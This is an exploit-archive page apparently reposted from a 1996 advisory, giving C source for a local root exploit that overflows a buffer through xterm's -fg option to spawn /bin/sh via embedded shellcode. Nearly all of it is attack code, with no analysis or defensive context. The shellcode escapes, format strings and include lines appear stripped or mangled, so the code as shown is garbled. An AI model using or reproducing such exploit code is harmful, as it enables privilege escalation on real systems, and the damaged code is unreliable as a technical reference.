Xt Library Local Root Command Execution Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Xt Library Local Root Command Execution Exploit
# Published : 1996-08-24
# Author : b0z0 bra1n
# Previous Title : Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits
# Next Title : BSD and Linux lpr Command Local Root Exploit

#include 
#include 
#include 

#define DEFAULT_OFFSET          0
#define BUFFER_SIZE             1491

long get_esp(void)
{
   __asm__("movl %esp,%eaxn");
}

main(int argc, char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   char execshell[] = "xebx23" "x5e" "x8dx1e" "x89x5ex0b" "x31xd2"
   "x89x56x07" "x89x56x0f" "x89x56x14" "x88x56x19" "x31xc0"
   "xb0x3b" "x8dx4ex0b" "x89xca" "x52" "x51" "x53" "x50"
"xebx18"
   "xe8xd8xffxffxff" "/bin/sh" "x01x01x01x01" "x02x02x02x02"
   "x03x03x03x03" "x9ax04x04x04x04x07x04";

   int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;

   if(argc>1)
        ofs=atoi(argv[1]);
   if(argc>2)
        bs=atoi(argv[2]);
   printf("Using offset of esp + %d (%x)nBuffer size %dn",
        ofs, get_esp()+ofs, bs);

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, bs-strlen(execshell));
   ptr += bs-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
}


// www.Syue.com [1996-08-24]